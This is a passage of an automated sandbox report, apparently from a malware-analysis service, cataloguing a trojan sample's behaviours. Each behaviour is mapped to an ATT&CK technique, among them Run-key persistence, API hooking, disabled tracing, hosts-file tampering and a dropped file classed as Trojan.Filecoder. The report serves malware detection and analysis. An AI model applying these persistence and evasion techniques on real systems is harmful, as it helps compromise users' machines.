\"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-193", "type": 6, "relevance": 3, "name": "Calls an API typically used to find device information", "description": "\"wmplayer.exe\" called \"SetupDiGetClassDevsW\" with parameters {\"ClassGuid\": \"0863f553bfb6d01194f200a0c91efb8b\"\n \"Flags\": \"18\"}", "origin": "API Call", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"134285383\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"134285389\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005796)\n \"wmplayer.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002988)\n \"WScript.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004824)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"vgmsite.com\" (89 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-4", "type": 17, "relevance": 5, "name": "Recently renewed or created SSL certificate", "description": "Newly renewed or created SSL certificate: \"vgmsite.com\" (0 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" opened \"\\Device\\KsecDD\"\n \"wmplayer.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"CreateDirectoryA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"send@WS2_32.DLL\" in \"wmplayer.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"Process32NextW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"WinExec@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"wmplayer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"wmplayer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "details too long to display", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005796]\n \"DISMHOST.EXE.67AB4E4F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\\\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"DISMHOST.EXE.67AB4E4F.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67AB4E4F.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" sleeping for \"1566804069\" milliseconds\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" sleeping for \"00600000\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"wmplayer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "17/22 Antivirus vendors marked dropped file \"xlsrvintl.dll\" as malicious (classified as \"Trojan.Filecoder\" with 77% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "api-32", "type": 6, "relevance": 10, "name": "Writes to the hosts file", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" wrote 79 bytes to file \"C:\\Windows\\System32\\drivers\\etc\\hosts\": 3132372e302e302e31207777772e646973636f72642e636f6d203132372e302e302e31207777772e676f6f676c652e636f6d203132372e302e302e31207777772e636c61737369637562652e636f6d", "origin": "API Call", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", 